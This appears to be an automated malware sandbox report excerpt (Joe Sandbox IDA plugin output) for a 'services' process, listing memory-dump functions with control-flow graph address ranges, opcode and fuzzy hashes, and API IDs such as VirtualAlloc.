                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1557 7ffd9b7ac87e-7ffd9b7ac880 1558 7ffd9b7ac893 1557->1558 1559 7ffd9b7ac882-7ffd9b7ac888 1557->1559 1560 7ffd9b7aca0f-7ffd9b7aca1b 1558->1560 1559->1558 1561 7ffd9b7aca26-7ffd9b7aca4d 1560->1561 1564 7ffd9b7ac5ec-7ffd9b7ac68a 1561->1564 1565 7ffd9b7aca53-7ffd9b7aca87 call 7ffd9b7adc96 1561->1565 1578 7ffd9b7ac68c-7ffd9b7ac6af 1564->1578 1579 7ffd9b7ac6ba-7ffd9b7ac6c9 1564->1579 1575 7ffd9b7aca89-7ffd9b7aca97 1565->1575 1577 7ffd9b7acaa2-7ffd9b7acb49 1575->1577 1596 7ffd9b7acc56-7ffd9b7accae 1577->1596 1597 7ffd9b7acb4f-7ffd9b7acb66 1577->1597 1578->1579 1581 7ffd9b7ac6cb 1579->1581 1582 7ffd9b7ac6d0-7ffd9b7ac6df 1579->1582 1581->1582 1584 7ffd9b7ac6f4-7ffd9b7ac70f 1582->1584 1585 7ffd9b7ac6e1-7ffd9b7ac6ef 1582->1585 1586 7ffd9b7ac72f-7ffd9b7aca04 1584->1586 1587 7ffd9b7ac711-7ffd9b7ac72b 1584->1587 1585->1561 1586->1560 1587->1586 1608 7ffd9b7ace45-7ffd9b7acf21 1596->1608 1609 7ffd9b7accb4-7ffd9b7accff 1596->1609 1600 7ffd9b7acb68-7ffd9b7acbae 1597->1600 1601 7ffd9b7acbb2-7ffd9b7acc4d 1597->1601 1600->1601 1601->1596 1629 7ffd9b7acc4f 1601->1629 1642 7ffd9b7acf27-7ffd9b7ad000 1608->1642 1643 7ffd9b7ad002-7ffd9b7ad048 1608->1643 1619 7ffd9b7ace2c-7ffd9b7ace39 1609->1619 1620 7ffd9b7ace3f-7ffd9b7ace40 1619->1620 1621 7ffd9b7acd04-7ffd9b7acd12 1619->1621 1623 7ffd9b7ad1fd-7ffd9b7ad25c 1620->1623 1625 7ffd9b7acd19-7ffd9b7acd99 1621->1625 1626 7ffd9b7acd14 1621->1626 1640 7ffd9b7ad524-7ffd9b7ad551 1623->1640 1638 7ffd9b7acd9b 1625->1638 1639 7ffd9b7acda0-7ffd9b7ace1a 1625->1639 1626->1625 1629->1596 1638->1639 1671 7ffd9b7ace1c-7ffd9b7ace21 1639->1671 1672 7ffd9b7ace24-7ffd9b7ace29 1639->1672 1648 7ffd9b7ad557-7ffd9b7ad57b call 7ffd9b7adcf9 1640->1648 1649 7ffd9b7ad261-7ffd9b7ad29d 1640->1649 1661 7ffd9b7ad04f-7ffd9b7ad055 1642->1661 1643->1661 1668 7ffd9b7ad57d 1648->1668 1669 7ffd9b7ad584-7ffd9b7ad5b8 1648->1669 1658 7ffd9b7ad2ba-7ffd9b7ad521 1649->1658 1659 7ffd9b7ad29f-7ffd9b7ad2b6 1649->1659 1658->1640 1659->1658 1664 7ffd9b7ad1ea-7ffd9b7ad1f7 1661->1664 1664->1623 1667 7ffd9b7ad05a-7ffd9b7ad068 1664->1667 1673 7ffd9b7ad06a 1667->1673 1674 7ffd9b7ad06f-7ffd9b7ad10f 1667->1674 1668->1669 1680 7ffd9b7ad5d8-7ffd9b7ad5f5 1669->1680 1681 7ffd9b7ad5ba-7ffd9b7ad5c7 1669->1681 1671->1672 1672->1619 1673->1674 1710 7ffd9b7ad17f-7ffd9b7ad1a7 1674->1710 1711 7ffd9b7ad111-7ffd9b7ad139 1674->1711 1687 7ffd9b7ad5fb-7ffd9b7ad6f9 1680->1687 1688 7ffd9b7ad7b4-7ffd9b7ad7b8 1680->1688 1685 7ffd9b7ad5c9 1681->1685 1686 7ffd9b7ad5ce-7ffd9b7ad5d6 1681->1686 1685->1686 1686->1680 1687->1688 1744 7ffd9b7ad6ff-7ffd9b7ad70b 1687->1744 1689 7ffd9b7adac7-7ffd9b7adb1f 1688->1689 1690 7ffd9b7ad7be-7ffd9b7ad7c7 1688->1690 1712 7ffd9b7adc87-7ffd9b7adc95 1689->1712 1713 7ffd9b7adb25-7ffd9b7adbba 1689->1713 1694 7ffd9b7ad7c9-7ffd9b7ad7ce 1690->1694 1695 7ffd9b7ad7d1-7ffd9b7ad7da 1690->1695 1694->1695 1699 7ffd9b7adab1-7ffd9b7adac1 1695->1699 1699->1689 1701 7ffd9b7ad7df-7ffd9b7ad7f0 1699->1701 1704 7ffd9b7ad7f7-7ffd9b7ad897 1701->1704 1705 7ffd9b7ad7f2 1701->1705 1738 7ffd9b7ad89d-7ffd9b7ad8fd 1704->1738 1739 7ffd9b7adaa3-7ffd9b7adaab 1704->1739 1705->1704 1720 7ffd9b7ad1a9 1710->1720 1721 7ffd9b7ad1ae-7ffd9b7ad1d7 1710->1721 1715 7ffd9b7ad13b 1711->1715 1716 7ffd9b7ad140-7ffd9b7ad17d 1711->1716 1713->1712 1743 7ffd9b7adbc0-7ffd9b7adbd1 1713->1743 1715->1716 1728 7ffd9b7ad1e2-7ffd9b7ad1e7 1716->1728 1720->1721 1721->1728 1728->1664 1752 7ffd9b7ad8ff 1738->1752 1753 7ffd9b7ad904-7ffd9b7ad90d 1738->1753 1739->1699 1746 7ffd9b7adbd8-7ffd9b7adc85 1743->1746 1747 7ffd9b7adbd3 1743->1747 1744->1688 1748 7ffd9b7ad711-7ffd9b7ad7a9 1744->1748 1746->1712 1747->1746 1748->1688 1752->1753 1756 7ffd9b7ada7c-7ffd9b7ada8a 1753->1756 1757 7ffd9b7ad913-7ffd9b7ad96b 1753->1757 1761 7ffd9b7ada8c 1756->1761 1762 7ffd9b7ada91-7ffd9b7ada99 1756->1762 1769 7ffd9b7ad9f7-7ffd9b7ada25 1757->1769 1770 7ffd9b7ad971-7ffd9b7ad99d 1757->1770 1761->1762 1763 7ffd9b7ada9b-7ffd9b7adaa0 1762->1763 1763->1739 1771 7ffd9b7ada27 1769->1771 1772 7ffd9b7ada2c-7ffd9b7ada7a 1769->1772 1773 7ffd9b7ad99f 1770->1773 1774 7ffd9b7ad9a4-7ffd9b7ad9f2 1770->1774 1771->1772 1772->1763 1773->1774 1774->1763
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7AB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7AB000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7ab000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 115636054e9c591f372ac51c56b6457ff7389a342779633f24692286869edde9
                                                                                                                                • Instruction ID: 5ef631e058c3f67635239f824bc1c431e6e57adc292a21729e45b30b811b29d7
                                                                                                                                • Opcode Fuzzy Hash: 115636054e9c591f372ac51c56b6457ff7389a342779633f24692286869edde9
                                                                                                                                • Instruction Fuzzy Hash: 2F42EE71A19A1D8FDFA8DB58C865BA9B7B1FF98301F1042E9D00DD32A5DA356E81CF40
                                                                                                                                Function 00007FFD9B7AC919 Relevance: .6, Instructions: 644COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 2222 7ffd9b7ac919-7ffd9b7ac921 2224 7ffd9b7aca0f-7ffd9b7aca1b 2222->2224 2225 7ffd9b7aca26-7ffd9b7aca4d 2224->2225 2228 7ffd9b7ac5ec-7ffd9b7ac68a 2225->2228 2229 7ffd9b7aca53-7ffd9b7aca87 call 7ffd9b7adc96 2225->2229 2242 7ffd9b7ac68c-7ffd9b7ac6af 2228->2242 2243 7ffd9b7ac6ba-7ffd9b7ac6c9 2228->2243 2239 7ffd9b7aca89-7ffd9b7aca97 2229->2239 2241 7ffd9b7acaa2-7ffd9b7acb49 2239->2241 2260 7ffd9b7acc56-7ffd9b7accae 2241->2260 2261 7ffd9b7acb4f-7ffd9b7acb66 2241->2261 2242->2243 2245 7ffd9b7ac6cb 2243->2245 2246 7ffd9b7ac6d0-7ffd9b7ac6df 2243->2246 2245->2246 2248 7ffd9b7ac6f4-7ffd9b7ac70f 2246->2248 2249 7ffd9b7ac6e1-7ffd9b7ac6ef 2246->2249 2250 7ffd9b7ac72f-7ffd9b7aca04 2248->2250 2251 7ffd9b7ac711-7ffd9b7ac72b 2248->2251 2249->2225 2250->2224 2251->2250 2272 7ffd9b7ace45-7ffd9b7acf21 2260->2272 2273 7ffd9b7accb4-7ffd9b7accff 2260->2273 2264 7ffd9b7acb68-7ffd9b7acbae 2261->2264 2265 7ffd9b7acbb2-7ffd9b7acc4d 2261->2265 2264->2265 2265->2260 2293 7ffd9b7acc4f 2265->2293 2306 7ffd9b7acf27-7ffd9b7ad000 2272->2306 2307 7ffd9b7ad002-7ffd9b7ad048 2272->2307 2283 7ffd9b7ace2c-7ffd9b7ace39 2273->2283 2284 7ffd9b7ace3f-7ffd9b7ace40 2283->2284 2285 7ffd9b7acd04-7ffd9b7acd12 2283->2285 2287 7ffd9b7ad1fd-7ffd9b7ad25c 2284->2287 2289 7ffd9b7acd19-7ffd9b7acd99 2285->2289 2290 7ffd9b7acd14 2285->2290 2304 7ffd9b7ad524-7ffd9b7ad551 2287->2304 2302 7ffd9b7acd9b 2289->2302 2303 7ffd9b7acda0-7ffd9b7ace1a 2289->2303 2290->2289 2293->2260 2302->2303 2335 7ffd9b7ace1c-7ffd9b7ace21 2303->2335 2336 7ffd9b7ace24-7ffd9b7ace29 2303->2336 2312 7ffd9b7ad557-7ffd9b7ad57b call 7ffd9b7adcf9 2304->2312 2313 7ffd9b7ad261-7ffd9b7ad29d 2304->2313 2325 7ffd9b7ad04f-7ffd9b7ad055 2306->2325 2307->2325 2332 7ffd9b7ad57d 2312->2332 2333 7ffd9b7ad584-7ffd9b7ad5b8 2312->2333 2322 7ffd9b7ad2ba-7ffd9b7ad521 2313->2322 2323 7ffd9b7ad29f-7ffd9b7ad2b6 2313->2323 2322->2304 2323->2322 2328 7ffd9b7ad1ea-7ffd9b7ad1f7 2325->2328 2328->2287 2331 7ffd9b7ad05a-7ffd9b7ad068 2328->2331 2337 7ffd9b7ad06a 2331->2337 2338 7ffd9b7ad06f-7ffd9b7ad10f 2331->2338 2332->2333 2344 7ffd9b7ad5d8-7ffd9b7ad5f5 2333->2344 2345 7ffd9b7ad5ba-7ffd9b7ad5c7 2333->2345 2335->2336 2336->2283 2337->2338 2374 7ffd9b7ad17f-7ffd9b7ad1a7 2338->2374 2375 7ffd9b7ad111-7ffd9b7ad139 2338->2375 2351 7ffd9b7ad5fb-7ffd9b7ad6f9 2344->2351 2352 7ffd9b7ad7b4-7ffd9b7ad7b8 2344->2352 2349 7ffd9b7ad5c9 2345->2349 2350 7ffd9b7ad5ce-7ffd9b7ad5d6 2345->2350 2349->2350 2350->2344 2351->2352 2408 7ffd9b7ad6ff-7ffd9b7ad70b 2351->2408 2353 7ffd9b7adac7-7ffd9b7adb1f 2352->2353 2354 7ffd9b7ad7be-7ffd9b7ad7c7 2352->2354 2376 7ffd9b7adc87-7ffd9b7adc95 2353->2376 2377 7ffd9b7adb25-7ffd9b7adbba 2353->2377 2358 7ffd9b7ad7c9-7ffd9b7ad7ce 2354->2358 2359 7ffd9b7ad7d1-7ffd9b7ad7da 2354->2359 2358->2359 2363 7ffd9b7adab1-7ffd9b7adac1 2359->2363 2363->2353 2365 7ffd9b7ad7df-7ffd9b7ad7f0 2363->2365 2368 7ffd9b7ad7f7-7ffd9b7ad897 2365->2368 2369 7ffd9b7ad7f2 2365->2369 2402 7ffd9b7ad89d-7ffd9b7ad8fd 2368->2402 2403 7ffd9b7adaa3-7ffd9b7adaab 2368->2403 2369->2368 2384 7ffd9b7ad1a9 2374->2384 2385 7ffd9b7ad1ae-7ffd9b7ad1d7 2374->2385 2379 7ffd9b7ad13b 2375->2379 2380 7ffd9b7ad140-7ffd9b7ad17d 2375->2380 2377->2376 2407 7ffd9b7adbc0-7ffd9b7adbd1 2377->2407 2379->2380 2392 7ffd9b7ad1e2-7ffd9b7ad1e7 2380->2392 2384->2385 2385->2392 2392->2328 2416 7ffd9b7ad8ff 2402->2416 2417 7ffd9b7ad904-7ffd9b7ad90d 2402->2417 2403->2363 2410 7ffd9b7adbd8-7ffd9b7adc85 2407->2410 2411 7ffd9b7adbd3 2407->2411 2408->2352 2412 7ffd9b7ad711-7ffd9b7ad7a9 2408->2412 2410->2376 2411->2410 2412->2352 2416->2417 2420 7ffd9b7ada7c-7ffd9b7ada8a 2417->2420 2421 7ffd9b7ad913-7ffd9b7ad96b 2417->2421 2425 7ffd9b7ada8c 2420->2425 2426 7ffd9b7ada91-7ffd9b7ada99 2420->2426 2433 7ffd9b7ad9f7-7ffd9b7ada25 2421->2433 2434 7ffd9b7ad971-7ffd9b7ad99d 2421->2434 2425->2426 2427 7ffd9b7ada9b-7ffd9b7adaa0 2426->2427 2427->2403 2435 7ffd9b7ada27 2433->2435 2436 7ffd9b7ada2c-7ffd9b7ada7a 2433->2436 2437 7ffd9b7ad99f 2434->2437 2438 7ffd9b7ad9a4-7ffd9b7ad9f2 2434->2438 2435->2436 2436->2427 2437->2438 2438->2427
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7AB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7AB000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7ab000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: cba86efc49d9d06128757b47c88d1867f5115a949273da7942e490a93bf9a7a4
                                                                                                                                • Instruction ID: a8cfcec506dd0f7a5590b5719feb1ec0bc089db8c08a25f0a358e15bbef66616
                                                                                                                                • Opcode Fuzzy Hash: cba86efc49d9d06128757b47c88d1867f5115a949273da7942e490a93bf9a7a4
                                                                                                                                • Instruction Fuzzy Hash: 5742DE71A19A1D8FDFA8DB58C865BA9B7B1FF98301F1042E9D00DD32A5DA356E81CF40
                                                                                                                                Function 00007FFD9B7AC88B Relevance: .6, Instructions: 644COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 2001 7ffd9b7ac88b-7ffd9b7ac893 2003 7ffd9b7aca0f-7ffd9b7aca1b 2001->2003 2004 7ffd9b7aca26-7ffd9b7aca4d 2003->2004 2007 7ffd9b7ac5ec-7ffd9b7ac68a 2004->2007 2008 7ffd9b7aca53-7ffd9b7aca87 call 7ffd9b7adc96 2004->2008 2021 7ffd9b7ac68c-7ffd9b7ac6af 2007->2021 2022 7ffd9b7ac6ba-7ffd9b7ac6c9 2007->2022 2018 7ffd9b7aca89-7ffd9b7aca97 2008->2018 2020 7ffd9b7acaa2-7ffd9b7acb49 2018->2020 2039 7ffd9b7acc56-7ffd9b7accae 2020->2039 2040 7ffd9b7acb4f-7ffd9b7acb66 2020->2040 2021->2022 2024 7ffd9b7ac6cb 2022->2024 2025 7ffd9b7ac6d0-7ffd9b7ac6df 2022->2025 2024->2025 2027 7ffd9b7ac6f4-7ffd9b7ac70f 2025->2027 2028 7ffd9b7ac6e1-7ffd9b7ac6ef 2025->2028 2029 7ffd9b7ac72f-7ffd9b7aca04 2027->2029 2030 7ffd9b7ac711-7ffd9b7ac72b 2027->2030 2028->2004 2029->2003 2030->2029 2051 7ffd9b7ace45-7ffd9b7acf21 2039->2051 2052 7ffd9b7accb4-7ffd9b7accff 2039->2052 2043 7ffd9b7acb68-7ffd9b7acbae 2040->2043 2044 7ffd9b7acbb2-7ffd9b7acc4d 2040->2044 2043->2044 2044->2039 2072 7ffd9b7acc4f 2044->2072 2085 7ffd9b7acf27-7ffd9b7ad000 2051->2085 2086 7ffd9b7ad002-7ffd9b7ad048 2051->2086 2062 7ffd9b7ace2c-7ffd9b7ace39 2052->2062 2063 7ffd9b7ace3f-7ffd9b7ace40 2062->2063 2064 7ffd9b7acd04-7ffd9b7acd12 2062->2064 2066 7ffd9b7ad1fd-7ffd9b7ad25c 2063->2066 2068 7ffd9b7acd19-7ffd9b7acd99 2064->2068 2069 7ffd9b7acd14 2064->2069 2083 7ffd9b7ad524-7ffd9b7ad551 2066->2083 2081 7ffd9b7acd9b 2068->2081 2082 7ffd9b7acda0-7ffd9b7ace1a 2068->2082 2069->2068 2072->2039 2081->2082 2114 7ffd9b7ace1c-7ffd9b7ace21 2082->2114 2115 7ffd9b7ace24-7ffd9b7ace29 2082->2115 2091 7ffd9b7ad557-7ffd9b7ad57b call 7ffd9b7adcf9 2083->2091 2092 7ffd9b7ad261-7ffd9b7ad29d 2083->2092 2104 7ffd9b7ad04f-7ffd9b7ad055 2085->2104 2086->2104 2111 7ffd9b7ad57d 2091->2111 2112 7ffd9b7ad584-7ffd9b7ad5b8 2091->2112 2101 7ffd9b7ad2ba-7ffd9b7ad521 2092->2101 2102 7ffd9b7ad29f-7ffd9b7ad2b6 2092->2102 2101->2083 2102->2101 2107 7ffd9b7ad1ea-7ffd9b7ad1f7 2104->2107 2107->2066 2110 7ffd9b7ad05a-7ffd9b7ad068 2107->2110 2116 7ffd9b7ad06a 2110->2116 2117 7ffd9b7ad06f-7ffd9b7ad10f 2110->2117 2111->2112 2123 7ffd9b7ad5d8-7ffd9b7ad5f5 2112->2123 2124 7ffd9b7ad5ba-7ffd9b7ad5c7 2112->2124 2114->2115 2115->2062 2116->2117 2153 7ffd9b7ad17f-7ffd9b7ad1a7 2117->2153 2154 7ffd9b7ad111-7ffd9b7ad139 2117->2154 2130 7ffd9b7ad5fb-7ffd9b7ad6f9 2123->2130 2131 7ffd9b7ad7b4-7ffd9b7ad7b8 2123->2131 2128 7ffd9b7ad5c9 2124->2128 2129 7ffd9b7ad5ce-7ffd9b7ad5d6 2124->2129 2128->2129 2129->2123 2130->2131 2187 7ffd9b7ad6ff-7ffd9b7ad70b 2130->2187 2132 7ffd9b7adac7-7ffd9b7adb1f 2131->2132 2133 7ffd9b7ad7be-7ffd9b7ad7c7 2131->2133 2155 7ffd9b7adc87-7ffd9b7adc95 2132->2155 2156 7ffd9b7adb25-7ffd9b7adbba 2132->2156 2137 7ffd9b7ad7c9-7ffd9b7ad7ce 2133->2137 2138 7ffd9b7ad7d1-7ffd9b7ad7da 2133->2138 2137->2138 2142 7ffd9b7adab1-7ffd9b7adac1 2138->2142 2142->2132 2144 7ffd9b7ad7df-7ffd9b7ad7f0 2142->2144 2147 7ffd9b7ad7f7-7ffd9b7ad897 2144->2147 2148 7ffd9b7ad7f2 2144->2148 2181 7ffd9b7ad89d-7ffd9b7ad8fd 2147->2181 2182 7ffd9b7adaa3-7ffd9b7adaab 2147->2182 2148->2147 2163 7ffd9b7ad1a9 2153->2163 2164 7ffd9b7ad1ae-7ffd9b7ad1d7 2153->2164 2158 7ffd9b7ad13b 2154->2158 2159 7ffd9b7ad140-7ffd9b7ad17d 2154->2159 2156->2155 2186 7ffd9b7adbc0-7ffd9b7adbd1 2156->2186 2158->2159 2171 7ffd9b7ad1e2-7ffd9b7ad1e7 2159->2171 2163->2164 2164->2171 2171->2107 2195 7ffd9b7ad8ff 2181->2195 2196 7ffd9b7ad904-7ffd9b7ad90d 2181->2196 2182->2142 2189 7ffd9b7adbd8-7ffd9b7adc85 2186->2189 2190 7ffd9b7adbd3 2186->2190 2187->2131 2191 7ffd9b7ad711-7ffd9b7ad7a9 2187->2191 2189->2155 2190->2189 2191->2131 2195->2196 2199 7ffd9b7ada7c-7ffd9b7ada8a 2196->2199 2200 7ffd9b7ad913-7ffd9b7ad96b 2196->2200 2204 7ffd9b7ada8c 2199->2204 2205 7ffd9b7ada91-7ffd9b7ada99 2199->2205 2212 7ffd9b7ad9f7-7ffd9b7ada25 2200->2212 2213 7ffd9b7ad971-7ffd9b7ad99d 2200->2213 2204->2205 2206 7ffd9b7ada9b-7ffd9b7adaa0 2205->2206 2206->2182 2214 7ffd9b7ada27 2212->2214 2215 7ffd9b7ada2c-7ffd9b7ada7a 2212->2215 2216 7ffd9b7ad99f 2213->2216 2217 7ffd9b7ad9a4-7ffd9b7ad9f2 2213->2217 2214->2215 2215->2206 2216->2217 2217->2206
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7AB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7AB000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7ab000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: cba86efc49d9d06128757b47c88d1867f5115a949273da7942e490a93bf9a7a4
                                                                                                                                • Instruction ID: a8cfcec506dd0f7a5590b5719feb1ec0bc089db8c08a25f0a358e15bbef66616
                                                                                                                                • Opcode Fuzzy Hash: cba86efc49d9d06128757b47c88d1867f5115a949273da7942e490a93bf9a7a4
                                                                                                                                • Instruction Fuzzy Hash: 5742DE71A19A1D8FDFA8DB58C865BA9B7B1FF98301F1042E9D00DD32A5DA356E81CF40
                                                                                                                                Function 00007FFD9B791AC5 Relevance: .3, Instructions: 272COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b790000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 997d4667a7629e6768229988b512ffdb8ae48cc8c0bb6c73ca563effa89ec468
                                                                                                                                • Instruction ID: 2b3329740bf48cdd74151a52738a93643101bfd4428c5541d4a4e7e1fb130ce0
                                                                                                                                • Opcode Fuzzy Hash: 997d4667a7629e6768229988b512ffdb8ae48cc8c0bb6c73ca563effa89ec468
                                                                                                                                • Instruction Fuzzy Hash: 16A18D71A19A898FE798DF98D8657F97BE1FF55300F1002BAD04AD77E6DB7828018740
                                                                                                                                Function 00007FFD9B7A295E Relevance: 1.7, APIs: 1, Instructions: 190memoryCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B79C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B79C000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b79c000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 544645111-0
                                                                                                                                • Opcode ID: 8d61e8b671755d0e6674a3b96b5ab5e8b305e3a2567c2827190be53894b2b3f2
                                                                                                                                • Instruction ID: ed643e17d9c3b6062d592fb09e1dbda20f4b51d185f535cdaafd9dee47d1e889
                                                                                                                                • Opcode Fuzzy Hash: 8d61e8b671755d0e6674a3b96b5ab5e8b305e3a2567c2827190be53894b2b3f2
                                                                                                                                • Instruction Fuzzy Hash: CD518030D0874D8FDB55DFA8C885AEDBBF1FB66310F1042AAD449E3266DB74A885CB41
                                                                                                                                Function 00007FFD9B7A434D Relevance: 1.4, APIs: 1, Instructions: 187memoryCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 71 7ffd9b7a434d-7ffd9b7a4483 VirtualAlloc 76 7ffd9b7a4485 71->76 77 7ffd9b7a448b-7ffd9b7a44ef 71->77 76->77
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B79C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B79C000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b79c000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                • Opcode ID: b1e2edec3e9cd2eb9d3ff37c2ab8b2d26b290246c9b0cd6a456651f8ea9680fd
                                                                                                                                • Instruction ID: e59d0163268fe9168d0eacf99e335fe96aadab076e7e435eae14b804e8b32836
                                                                                                                                • Opcode Fuzzy Hash: b1e2edec3e9cd2eb9d3ff37c2ab8b2d26b290246c9b0cd6a456651f8ea9680fd
                                                                                                                                • Instruction Fuzzy Hash: F0514970908A5C8FDF94EF68C845BE9BBF1FB69310F1042AAD04DE3251CB71A9858B80
                                                                                                                                Function 00007FFD9B7D8E7D Relevance: .4, Instructions: 431COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ecb7d8f5c5248fe50b516c7f7443fbd39c2495c178ead63696dbe7fe3ff793f6
                                                                                                                                • Instruction ID: 5abbea3f3a00066d4c44061368f38ae8ad6c2d94ada3de6e1d775b9ff5bbbc42
                                                                                                                                • Opcode Fuzzy Hash: ecb7d8f5c5248fe50b516c7f7443fbd39c2495c178ead63696dbe7fe3ff793f6
                                                                                                                                • Instruction Fuzzy Hash: 50F16271E1965E8FDB98DF58C865BBCB7A2FF98340F4442BAD00DD32A2DA346944CB41
                                                                                                                                Function 00007FFD9B790A19 Relevance: .3, Instructions: 281COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b790000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0945bb430f20cf4fc451a4d58a93b5a9f9b8665ee7c9eb96e1ede76c969ad6db
                                                                                                                                • Instruction ID: 32b152944612dd72ee755398fc8c07bc058460fdd3e791b760d541b6480c6636
                                                                                                                                • Opcode Fuzzy Hash: 0945bb430f20cf4fc451a4d58a93b5a9f9b8665ee7c9eb96e1ede76c969ad6db
                                                                                                                                • Instruction Fuzzy Hash: 7C713915B2EB4E4AE3696A7C08652B976C2EF85B15F26027DE4DFC32E7DC1C69034281
                                                                                                                                Function 00007FFD9B7ADE85 Relevance: .2, Instructions: 240COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7AB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7AB000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7ab000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: dbb35d979ea4a49cfe714e04ee130edb8f6afad85717d2100918f1e17355038e
                                                                                                                                • Instruction ID: fbb38878675d0910e22ef7d9c85b8785d043e78e0f0c74d9c1e7212dd2fb2845
                                                                                                                                • Opcode Fuzzy Hash: dbb35d979ea4a49cfe714e04ee130edb8f6afad85717d2100918f1e17355038e
                                                                                                                                • Instruction Fuzzy Hash: 7A916271E19A5D8FEB94EF98C8657ADB7E1FF69300F1002B9D00DD32A6DE3469848B41
                                                                                                                                Function 00007FFD9B7ADF03 Relevance: .2, Instructions: 216COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7AB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7AB000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7ab000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 12f82f9dea0df447877e2f5fc68a34bccd240132e933e3113e0d4161f1b04ade
                                                                                                                                • Instruction ID: db82adbbcb98a15c33e9475773bb7155ad7d080d8830c8cb0dfb6e5fb9235142
                                                                                                                                • Opcode Fuzzy Hash: 12f82f9dea0df447877e2f5fc68a34bccd240132e933e3113e0d4161f1b04ade
                                                                                                                                • Instruction Fuzzy Hash: 0C814170E19A5D8FEB94EF98C8657ADB7E1FF69300F1002B9D00DD32A6DE3469858B41
                                                                                                                                Function 00007FFD9B790870 Relevance: .2, Instructions: 163COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
